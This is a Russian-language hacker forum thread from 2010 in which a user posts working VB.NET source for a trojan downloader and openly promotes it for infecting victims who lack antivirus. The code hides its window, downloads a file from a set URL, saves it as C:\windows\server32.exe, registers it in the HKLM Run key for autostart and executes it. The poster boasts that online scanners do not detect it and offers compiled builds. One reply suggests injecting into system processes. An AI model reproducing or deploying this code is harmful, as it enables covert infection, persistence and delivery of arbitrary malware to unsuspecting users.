Троян даунлоудер (vb.net 2008)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Троян даунлоудер (vb.net 2008) - 2010-04-17 00:35:29.580000
|
|
|
DeepBlue7.
Сообщений: 186
Оценки: 0
Присоединился: 2010-04-14 21:59:42.853333
|
Незаменимая программа для "впарки" троянов и тому подобной нечисти. Скачивает с сайта и запускает файл.
http://scanner.novirusthanks.org/analysis/3dc00d5e628acb3c1c745fde2bd32d41/dGQuZXhl/ - ничем не палится. Очень полезно для впаривания
вирусятины тем, у кого нет антивируса, но кто проверяет файлы на сайтах на подобии novirusthanks.org и virustotal.com :)
Собственно соурс :
Public Class Form
Dim path As String = "C:\windows\server32.exe" ' Лучше не менять, иначе не будет работать автозагрузка
Dim url As String = "http://www.rarlab.com/rar/winrar-x64-393.exe" ' Откуда скачивать файл
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
Me.Hide() ' Прячем окно
If My.Computer.FileSystem.FileExists(path) = True Then
My.Computer.FileSystem.DeleteFile(path) ' Если файл уже сущиствует - удаляем его
End If
If My.Computer.FileSystem.FileExists(path) = False Then
My.Computer.Network.DownloadFile(url, path) ' Скачиваем файл
Do Until My.Computer.FileSystem.FileExists(path) ' Ждем пока файл не скачается
Loop
End If
My.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "system", "server32.exe") ' Добавляем файл в автозагрузку
Shell(path) ' Запускаем файл
Me.Close() ' Закрываем программу
End Sub
End Class
Если кому надо скомпилировать - пишите в ПМ. Мож кому и пригодится ))
Обьясняю просто. Есть люди, у которых на компьютере НЕТУ антивируса (т.е. их можно затроянить), но проверяют все файлы которые скачивают сервисами на подобии virustotal и novirusthanks. Эта же прога - сама по себе безвредна, но если её запустить - то она скачивает сам вирус и запускает его, а так-же добавляет в папку автозагрузки. Изначально никакой антивирус не обнаруживает в ней какой либо угрозы.
|
|
|
|
|
RE: Троян даунлоудер (vb.net 2008) - 2010-04-17 00:52:29.520000
|
|
|
Fill30
Сообщений: 225
Оценки: 0
Присоединился: 2010-03-14 20:27:43.533333
|
повнятней можно как работает?
|
|
|
|
|
RE: Троян даунлоудер (vb.net 2008) - 2010-04-17 00:56:00.716666
|
|
|
DeepBlue7.
Сообщений: 186
Оценки: 0
Присоединился: 2010-04-14 21:59:42.853333
|
quote:
ORIGINAL: Fill30
повнятней можно как работает?
Дописал, в 1 посте.
|
|
|
|
|
RE: Троян даунлоудер (vb.net 2008) - 2010-04-17 06:08:57.906666
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
В обработчике все написано. Собственно что не понятного?
Скачиваешь прогу, запускаешь, срабатывает обработчик, скачивает с сайта трипак.
p.s. можно свой дл сделать который после обработчика, будет совмещаться с процессом (ядра)
Это будет куда грамотнее…
|
|
|
|
|
|
